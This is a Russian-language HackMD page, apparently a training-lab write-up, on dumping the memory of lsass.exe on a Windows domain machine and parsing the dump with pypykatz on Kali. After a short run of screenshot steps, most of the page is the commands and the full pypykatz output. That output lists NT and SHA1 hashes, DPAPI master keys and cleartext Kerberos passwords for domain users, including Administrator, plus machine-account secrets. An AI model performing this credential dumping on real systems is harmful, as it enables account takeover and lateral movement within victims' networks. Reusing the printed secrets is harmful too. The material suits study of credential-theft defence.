HackMD - Collaborative Markdown Knowledge Base

Проанализировать память процесса lsass.exe ![](https://i.imgur.com/SvQfjvd.png) Попробуем обратиться к ресурсам домена ![](https://i.imgur.com/77QOrHu.png) Зайдём под учетной записью Петра ![](https://i.imgur.com/LgVw0hr.png) Запустим командную строку от имени администратора ![](https://i.imgur.com/ttODD2m.png) ![](https://i.imgur.com/pqvflzO.png) Откроем подробное представление, перейдём в подробности и найдём процесс lsass.exe ![](https://i.imgur.com/xjkPG2R.png) ![](https://i.imgur.com/5mF5F21.png) ![](https://i.imgur.com/vZRcBgf.png) ![](https://i.imgur.com/enouSGr.png) ![](https://i.imgur.com/ypuScw9.png) ![](https://i.imgur.com/I0dTG7H.png) ![](https://i.imgur.com/S30eyxB.png) ![](https://i.imgur.com/CbbUFkF.png) ![](https://i.imgur.com/2XnaFQx.png) ┌──(root㉿kali)-[~] └─# ls /home/kali Desktop Documents Downloads lsass.DMP Music Pictures Public Templates Videos ┌──(root㉿kali)-[~] └─# cd /home/kali ┌──(root㉿kali)-[/home/kali] └─# git clone https://github.com/skelsec/pypykatz Cloning into 'pypykatz'... remote: Enumerating objects: 2933, done. remote: Counting objects: 100% (313/313), done. remote: Compressing objects: 100% (163/163), done. remote: Total 2933 (delta 169), reused 167 (delta 150), pack-reused 2620 Receiving objects: 100% (2933/2933), 884.81 KiB | 3.95 MiB/s, done. Resolving deltas: 100% (1885/1885), done. ┌──(root㉿kali)-[/home/kali] └─# cd pypykatz/pypykatz ┌──(root㉿kali)-[/home/kali/pypykatz/pypykatz] └─# pypykatz lsa minidump /home/kali/lsass.DMP INFO:root:Parsing file /home/kali/lsass.DMP FILE: ======== /home/kali/lsass.DMP ======= == LogonSession == authentication_id 8619869 (83875d) session_id 1 username ADMPetr domainname PT logon_server DC2 logon_time 2022-08-30T08:34:28.134851+00:00 sid S-1-5-21-401149468-3853512588-1824150382-1132 luid 8619869 == MSV == Username: ADMPetr Domain: PT LM: NA NT: 05df2fd1109e3d3b60f110965f6af128 SHA1: 604b96bb078895c93f327a5af4dd828a3ce55100 DPAPI: 732e6ff3d1ab5a88d0f3cf4e25a4a3e1 == WDIGEST [83875d]== username ADMPetr domainname PT password None == Kerberos == Username: ADMPetr Domain: PT.LOCAL Password: Qq123456 == WDIGEST [83875d]== username ADMPetr domainname PT password None == LogonSession == authentication_id 8581270 (82f096) session_id 1 username ADMPetr domainname PT logon_server DC2 logon_time 2022-08-30T08:33:55.871544+00:00 sid S-1-5-21-401149468-3853512588-1824150382-1132 luid 8581270 == MSV == Username: ADMPetr Domain: PT LM: NA NT: 05df2fd1109e3d3b60f110965f6af128 SHA1: 604b96bb078895c93f327a5af4dd828a3ce55100 DPAPI: 732e6ff3d1ab5a88d0f3cf4e25a4a3e1 == WDIGEST [82f096]== username ADMPetr domainname PT password None == Kerberos == Username: ADMPetr Domain: PT.LOCAL Password: Qq123456 == WDIGEST [82f096]== username ADMPetr domainname PT password None == LogonSession == authentication_id 8315750 (7ee366) session_id 1 username Administrator domainname PT logon_server DC2 logon_time 2022-08-30T08:33:15.206622+00:00 sid S-1-5-21-401149468-3853512588-1824150382-500 luid 8315750 == MSV == Username: Administrator Domain: PT LM: NA NT: c066aa9a9c0dd0d4738660eab03fb3ca SHA1: 40fc220ec0e051035e65123346f5a5247e9eff1c DPAPI: dc2974f916e996c725d4097a827badb2 == WDIGEST [7ee366]== username Administrator domainname PT password None == Kerberos == Username: Administrator Domain: PT.LOCAL Password: 45182Sis19867 == WDIGEST [7ee366]== username Administrator domainname PT password None == LogonSession == authentication_id 7716886 (75c016) session_id 1 username ADMPetr domainname PT logon_server DC2 logon_time 2022-08-30T08:31:58.379693+00:00 sid S-1-5-21-401149468-3853512588-1824150382-1132 luid 7716886 == MSV == Username: ADMPetr Domain: PT LM: NA NT: 05df2fd1109e3d3b60f110965f6af128 SHA1: 604b96bb078895c93f327a5af4dd828a3ce55100 DPAPI: 732e6ff3d1ab5a88d0f3cf4e25a4a3e1 == WDIGEST [75c016]== username ADMPetr domainname PT password None == Kerberos == Username: ADMPetr Domain: PT.LOCAL Password: Qq123456 == WDIGEST [75c016]== username ADMPetr domainname PT password None == LogonSession == authentication_id 6634175 (653abf) session_id 1 username ADMPetr domainname PT logon_server DC2 logon_time 2022-08-30T08:28:49.513640+00:00 sid S-1-5-21-401149468-3853512588-1824150382-1132 luid 6634175 == MSV == Username: ADMPetr Domain: PT LM: NA NT: 05df2fd1109e3d3b60f110965f6af128 SHA1: 604b96bb078895c93f327a5af4dd828a3ce55100 DPAPI: 732e6ff3d1ab5a88d0f3cf4e25a4a3e1 == WDIGEST [653abf]== username ADMPetr domainname PT password None == Kerberos == Username: ADMPetr Domain: PT.LOCAL Password: Qq123456 == WDIGEST [653abf]== username ADMPetr domainname PT password None == LogonSession == authentication_id 6457526 (6288b6) session_id 1 username ADMPetr domainname PT logon_server DC2 logon_time 2022-08-30T08:27:53.976660+00:00 sid S-1-5-21-401149468-3853512588-1824150382-1132 luid 6457526 == MSV == Username: ADMPetr Domain: PT LM: NA NT: 05df2fd1109e3d3b60f110965f6af128 SHA1: 604b96bb078895c93f327a5af4dd828a3ce55100 DPAPI: 732e6ff3d1ab5a88d0f3cf4e25a4a3e1 == WDIGEST [6288b6]== username ADMPetr domainname PT password None == Kerberos == Username: ADMPetr Domain: PT.LOCAL Password: Qq123456 == WDIGEST [6288b6]== username ADMPetr domainname PT password None == LogonSession == authentication_id 5514903 (542697) session_id 1 username Petr domainname PT logon_server DC2 logon_time 2022-08-30T08:25:07.178437+00:00 sid S-1-5-21-401149468-3853512588-1824150382-1108 luid 5514903 == MSV == Username: Petr Domain: PT LM: NA NT: 120943a1101014ab6c2c035b079f6e6d SHA1: 47d03e79758aa5e6709ea5c51bc87385bc127c2c DPAPI: d8de6d709299b49ae851e5afb76fa4b9 == WDIGEST [542697]== username Petr domainname PT password None == Kerberos == Username: Petr Domain: PT.LOCAL Password: P-Qq123456 == WDIGEST [542697]== username Petr domainname PT password None == DPAPI [542697]== luid 5514903 key_guid ba09cdcc-d6ad-4f35-9a06-4612ec454e48 masterkey e8b0aee5e7de400fe478b324a1c1567780335ec687e548e62a4c6ba69ca402657fa59d1a3dcd0d6d9d7c02578db5423726e125acbc708533bd81374592dbf9e1 sha1_masterkey 4bd5b798817b971dc7440bdc42f3f4e6b1e5f3fe == LogonSession == authentication_id 997 (3e5) session_id 0 username LOCAL SERVICE domainname NT AUTHORITY logon_server logon_time 2022-08-30T00:20:39.566328+00:00 sid S-1-5-19 luid 997 == Kerberos == Username: Domain: == LogonSession == authentication_id 48102 (bbe6) session_id 1 username DWM-1 domainname Window Manager logon_server logon_time 2022-08-30T00:20:38.909333+00:00 sid S-1-5-90-0-1 luid 48102 == MSV == Username: PC1$ Domain: PT LM: NA NT: 1e0ab48167612e37af7f61457d270978 SHA1: 6170a06bdddd7be87c36ae0246785f08753e2d09 DPAPI: NA == WDIGEST [bbe6]== username PC1$ domainname PT password None == Kerberos == Username: PC1$ Domain: pt.local Password: 6c0079002b0052005d0056006a0031004a004000220038002100790060002b0060002b0049002100620059006100390053003c006c004200680063006d005c005e0067002a004e0028003400490071005500280069005c00240024006f0044002500210033006a0063007a004d0047005b0075007700420069002700370044004f005900630028005d0028006000250063004f0069006a003400750037004d0020002400410072003500650064003c004f0048003d003c006600740049002a002500730036005e005c006d006a0022004e00680069002a0074005a0032006900620037002400610033005b0021004300 == WDIGEST [bbe6]== username PC1$ domainname PT password None == LogonSession == authentication_id 47892 (bb14) session_id 1 username DWM-1 domainname Window Manager logon_server logon_time 2022-08-30T00:20:38.902937+00:00 sid S-1-5-90-0-1 luid 47892 == MSV == Username: PC1$ Domain: PT LM: NA NT: 1e0ab48167612e37af7f61457d270978 SHA1: 6170a06bdddd7be87c36ae0246785f08753e2d09 DPAPI: NA == WDIGEST [bb14]== username PC1$ domainname PT password None == Kerberos == Username: PC1$ Domain: pt.local Password: 6c0079002b0052005d0056006a0031004a004000220038002100790060002b0060002b0049002100620059006100390053003c006c004200680063006d005c005e0067002a004e0028003400490071005500280069005c00240024006f0044002500210033006a0063007a004d0047005b0075007700420069002700370044004f005900630028005d0028006000250063004f0069006a003400750037004d0020002400410072003500650064003c004f0048003d003c006600740049002a002500730036005e005c006d006a0022004e00680069002a0074005a0032006900620037002400610033005b0021004300 == WDIGEST [bb14]== username PC1$ domainname PT password None == LogonSession == authentication_id 996 (3e4) session_id 0 username PC1$ domainname PT logon_server logon_time 2022-08-30T00:20:37.988166+00:00 sid S-1-5-20 luid 996 == MSV == Username: PC1$ Domain: PT LM: NA NT: 1e0ab48167612e37af7f61457d270978 SHA1: 6170a06bdddd7be87c36ae0246785f08753e2d09 DPAPI: NA == WDIGEST [3e4]== username PC1$ domainname PT password None == Kerberos == Username: pc1$ Domain: pt.local Password: 6c0079002b0052005d0056006a0031004a004000220038002100790060002b0060002b0049002100620059006100390053003c006c004200680063006d005c005e0067002a004e0028003400490071005500280069005c00240024006f0044002500210033006a0063007a004d0047005b0075007700420069002700370044004f005900630028005d0028006000250063004f0069006a003400750037004d0020002400410072003500650064003c004f0048003d003c006600740049002a002500730036005e005c006d006a0022004e00680069002a0074005a0032006900620037002400610033005b0021004300 == WDIGEST [3e4]== username PC1$ domainname PT password None == LogonSession == authentication_id 27426 (6b22) session_id 0 username UMFD-0 domainname Font Driver Host logon_server logon_time 2022-08-30T00:20:37.074333+00:00 sid S-1-5-96-0-0 luid 27426 == MSV == Username: PC1$ Domain: PT LM: NA NT: 1e0ab48167612e37af7f61457d270978 SHA1: 6170a06bdddd7be87c36ae0246785f08753e2d09 DPAPI: NA == WDIGEST [6b22]== username PC1$ domainname PT password None == Kerberos == Username: PC1$ Domain: pt.local Password: 6c0079002b0052005d0056006a0031004a004000220038002100790060002b0060002b0049002100620059006100390053003c006c004200680063006d005c005e0067002a004e0028003400490071005500280069005c00240024006f0044002500210033006a0063007a004d0047005b0075007700420069002700370044004f005900630028005d0028006000250063004f0069006a003400750037004d0020002400410072003500650064003c004f0048003d003c006600740049002a002500730036005e005c006d006a0022004e00680069002a0074005a0032006900620037002400610033005b0021004300 == WDIGEST [6b22]== username PC1$ domainname PT password None == LogonSession == authentication_id 27351 (6ad7) session_id 1 username UMFD-1 domainname Font Driver Host logon_server logon_time 2022-08-30T00:20:37.038203+00:00 sid S-1-5-96-0-1 luid 27351 == MSV == Username: PC1$ Domain: PT LM: NA NT: 1e0ab48167612e37af7f61457d270978 SHA1: 6170a06bdddd7be87c36ae0246785f08753e2d09 DPAPI: NA == WDIGEST [6ad7]== username PC1$ domainname PT password None == Kerberos == Username: PC1$ Domain: pt.local Password: 6c0079002b0052005d0056006a0031004a004000220038002100790060002b0060002b0049002100620059006100390053003c006c004200680063006d005c005e0067002a004e0028003400490071005500280069005c00240024006f0044002500210033006a0063007a004d0047005b0075007700420069002700370044004f005900630028005d0028006000250063004f0069006a003400750037004d0020002400410072003500650064003c004f0048003d003c006600740049002a002500730036005e005c006d006a0022004e00680069002a0074005a0032006900620037002400610033005b0021004300 == WDIGEST [6ad7]== username PC1$ domainname PT password None == LogonSession == authentication_id 26107 (65fb) session_id 0 username domainname logon_server logon_time 2022-08-30T00:20:36.768554+00:00 sid None luid 26107 == MSV == Username: PC1$ Domain: PT LM: NA NT: 1e0ab48167612e37af7f61457d270978 SHA1: 6170a06bdddd7be87c36ae0246785f08753e2d09 DPAPI: NA == LogonSession == authentication_id 999 (3e7) session_id 0 username PC1$ domainname PT logon_server logon_time 2022-08-30T00:20:36.740403+00:00 sid S-1-5-18 luid 999 == WDIGEST [3e7]== username PC1$ domainname PT password None == Kerberos == Username: pc1$ Domain: PT.LOCAL Password: 6c0079002b0052005d0056006a0031004a004000220038002100790060002b0060002b0049002100620059006100390053003c006c004200680063006d005c005e0067002a004e0028003400490071005500280069005c00240024006f0044002500210033006a0063007a004d0047005b0075007700420069002700370044004f005900630028005d0028006000250063004f0069006a003400750037004d0020002400410072003500650064003c004f0048003d003c006600740049002a002500730036005e005c006d006a0022004e00680069002a0074005a0032006900620037002400610033005b0021004300 == WDIGEST [3e7]== username PC1$ domainname PT password None == DPAPI [3e7]== luid 999 key_guid 08bf8169-9505-4b44-8a82-a3099f58feb9 masterkey 3c616caeaf5cfa958563ad8918450f9d067f73e4c1ce296f144a1525591542a2f6df218ea0f94c19bd5cff8952c44224d6b03e9ac7bdd9f3a18ba4cbaaa82f1d sha1_masterkey 5a5b7ac44c4120f1f93ce37172d19a41a14af478 == DPAPI [3e7]== luid 999 key_guid 5a1abb57-b931-4401-8f4e-21c62f11ee23 masterkey a65a909a44af23356e78a7c1a363f7a9ec465714a63a43f0c18438d60ed6791c01d1cd2eefae898872613f41a7fc3d4a3ed7e1178f39673cdc0efcbcdc0fad70 sha1_masterkey a17a4265eb51c9f48aae7bd36e74dd7b256d324e == DPAPI [3e7]== luid 999 key_guid 9f40005f-9423-42d6-bc38-b5d6593838fb masterkey 7dc46bacc32fe979941048efb5b8531ac5df005c6efbd503a90f4e6aad53f3a54d53a208779783673219050b5c88dbcf3b2e671859ebb684dfb092c61f0dec6b sha1_masterkey 75121ecf01419415549c4f1345e869407dc53aae == DPAPI [3e7]== luid 999 key_guid 02cb1163-d696-4eaa-a2f6-8a6f1384b9ad masterkey 44879d481cbc9b58b680a0e3dba6b542cf11ee2aab42fd812ceca81c9841da5be0ee4c6826fa894e991b97ba26659dea12bd27cc0a71a07a5713856bfa16be09 sha1_masterkey 0ef40b0051eab7f174e0ae842114f6d471fafa51